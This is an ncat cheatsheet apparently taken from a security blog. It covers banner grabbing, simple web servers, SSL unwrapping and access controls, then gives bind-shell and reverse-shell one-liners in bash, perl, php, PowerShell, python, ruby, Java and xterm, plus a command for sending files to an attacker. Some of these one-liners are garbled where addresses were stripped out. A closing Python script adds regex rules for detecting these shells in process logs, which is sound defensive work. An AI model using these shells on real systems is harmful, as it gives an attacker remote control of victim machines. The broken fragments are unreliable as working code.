Ncat Cheatsheet

Dec 21, 2017
ncat — Concatenate and redirect sockets

ncat [ <OPTIONS> ...] [ <hostname> ] [ <port> ]

Banner Grab

printf "GET / HTTP/1.0\r\n\r\n" | ncat 80
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 19 Dec 2017 20:01:10 GMT
Content-Type: text/html
Content-Length: 178
Connection: close

<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>

SSL Banner Grab

printf "GET / HTTP/1.0\r\n\r\n" | ncat 443 --ssl
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 19 Dec 2017 20:01:59 GMT
Content-Type: text/html
Content-Length: 28379
Last-Modified: Tue, 19 Dec 2017 15:31:41 GMT
Connection: close
ETag: "5a3930dd-6edb"
Accept-Ranges: bytes

<!DOCTYPE html>
<html lang="en">

Simple Web Server

echo '<html><body>This is ncat webserver</body></html>' > stuff.html
ncat -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat stuff.html"

Once the ncat command is running, open a web browser and point it at localhost on port 8080.

Accept multiple requests

ncat --keep-open -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/stuff.html"

A Better HTTP Server

There’s a neat Lua script that takes advantage of ncat’s --lua-exec support for running Lua against each connection. The script can be found here. Try saving it to /tmp/httpd.lua

Navigate to a directory with .html files in it, and run the following command.

ncat -l -p 8080 --lua-exec /tmp/httpd.lua --keep-open

Unwrap SSL Connections

Listen on port 6666 as a plain-text server. Upon connection, connect to using SSL and forward client / server traffic. It also saves the full session to out.log for later analysis.

ncat -l -p 6666 -c 'ncat --ssl 443' --keep-open -o out.log

Grab our remote IP address by using an HTTP connection to localhost:6666, which handles the connection to using SSL.

curl 'http://localhost:6666?format=json' -H 'Host:'

Connect two incoming connections

ncat -l -p 8080 -c 'ncat -l -p 9090'

Connect two listening servers

This can have some very interesting results.

ncat localhost 8080 -c 'ncat localhost 9090'

For more, check out our pivoting cheatsheet.

ncat -t 23

Simple Chat

ncat -l 1234 --chat

ncat localhost 1234

Copy Files with UDP

ncat -l 6666 --udp

ncat --udp localhost 6666 <
Access Controls

Whitelist IPs

ncat -l -p 8080 --allow

Whitelist from file

Hosts should be separated by newlines (one host per line).

ncat -l -p 8080 --allowfile hosts

Blacklist IPs

ncat -l -p 8080 --deny,

Blacklist IPs from file

Hosts should be separated by newlines (one host per line).

ncat -l -p 8080 --denyfile hosts

File Transfer with SSL

Reverse file transfer to attacker

ncat -l -p 6666 --ssl > outputfile

ncat --ssl --send-only <attacker ip> 6666 < /bin/ncat

File send w/ Sender listening

ncat -l --ssl -p 6666 --send-only < /bin/ncat

ncat localhost 6666 --ssl > outputfile

Bind Shell

ncat -l 6666 -e /bin/sh

ncat -l 6666 -e cmd

Reverse Shell

ncat <attacker ip address> 6666 -e /bin/sh

ncat -l -p 6666

Victim machine doesn’t have ncat?

bash -i >& /dev/tcp/<attacker ip address>/6666 0>&1

perl -e 'use Socket;$i="";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

php -r '$sock=fsockopen("",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("<attacker ip address>"),<listening port>);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()

Python 2.7 and 3

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker ip address>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);

ProTip: This may become a lot easier on Windows and OSX hosts in the future if Microsoft adds Python as a language for Excel.

ruby -rsocket -e'"",6666).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc -e /bin/sh 6666

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you ( on TCP port 6001.

xterm -display

We need to modify /etc/X11/Xwrapper.config and change the allowed_users line to look like this. This file often gets overwritten on updates. After the file has been saved, restart the X11 login manager.

To catch the incoming xterm, start an X server (:1 — which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):

Xnest -ac :1

You’ll need to authorise the target to connect to you (command also run on your host):

xhost +targetip
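As an added defender-side example (not from the original post), the following Python script runs regular-expression rules built from the command patterns in the Bind Shell, Reverse Shell and "Victim machine doesn't have ncat?" sections over a handful of constructed process-execution log lines. The rule names, host names, user names and the 203.0.113.5 address are assumptions chosen for illustration.

```python
import re

# Constructed rules keyed on the command-line patterns shown on this page, meant
# to run over process-execution telemetry (auditd execve, Sysmon event ID 1).
RULES = {
    # ncat/nc handed a shell through -e/--exec/-c/--sh-exec (bind or reverse shell)
    "ncat_exec_shell": re.compile(
        r"\b(?:ncat|nc)\b.*\s(?:-e|--exec|-c|--sh-exec)\s+\S*(?:sh|cmd)\b"),
    # bash wiring its own stdio to /dev/tcp or /dev/udp
    "bash_dev_tcp": re.compile(r"/dev/(?:tcp|udp)/"),
    # perl/php/python/ruby one-liners: a socket call followed by dup2 or exec
    "script_socket_exec": re.compile(
        r"\b(?:socket|fsockopen|TCPSocket)\b.*\b(?:dup2|exec)\b"),
    # PowerShell UDP loop that evaluates whatever it receives
    "ps_udp_iex": re.compile(r"UDPClient\(.*\biex\b", re.IGNORECASE),
    # xterm pointed at a remote X display
    "xterm_remote_display": re.compile(r"\bxterm\b.*-display\s+\S+:\d+"),
}

# Constructed sample events, "host user cmdline"; 203.0.113.5 is a documentation address.
LOG_LINES = [
    "web01 www-data ncat -l 6666 -e /bin/sh",
    "web01 www-data bash -i >& /dev/tcp/203.0.113.5/6666 0>&1",
    "web01 www-data perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));...;exec(\"/bin/sh -i\")'",
    "web01 www-data python -c 'import socket,os;s=socket.socket();...;os.dup2(s.fileno(),0)'",
    'ws07 alice powershell -c "$client = New-Object System.Net.Sockets.UDPClient(53);...;iex $returndata"',
    "web01 www-data xterm -display 203.0.113.5:1",
    # benign uses of the same tools, which the rules must leave alone
    'web01 root ncat -l -p 8080 --keep-open --allowfile hosts -c "printf \'HTTP/1.1 200 OK\'; cat stuff.html"',
    "web01 root python3 -c 'import socket; print(socket.gethostname())'",
    r"web01 root printf 'GET / HTTP/1.0\r\n\r\n' | ncat example.com 80",
]

def match_rules(cmdline):
    """Return the names of every rule the command line trips, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def scan(lines):
    """Return {cmdline: [rule, ...]} for each event that trips at least one rule."""
    hits = {}
    for line in lines:
        _host, _user, cmdline = line.split(" ", 2)
        matched = match_rules(cmdline)
        if matched:
            hits[cmdline] = matched
    return hits

if __name__ == "__main__":
    for cmdline, rules in scan(LOG_LINES).items():
        print(f"{','.join(rules):22} {cmdline}")
```

The three benign lines at the end of the sample (the page's own web server, a harmless socket import, and a banner grab) are there to show that the rules key on the exec/dup2 step rather than on the tool name alone.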

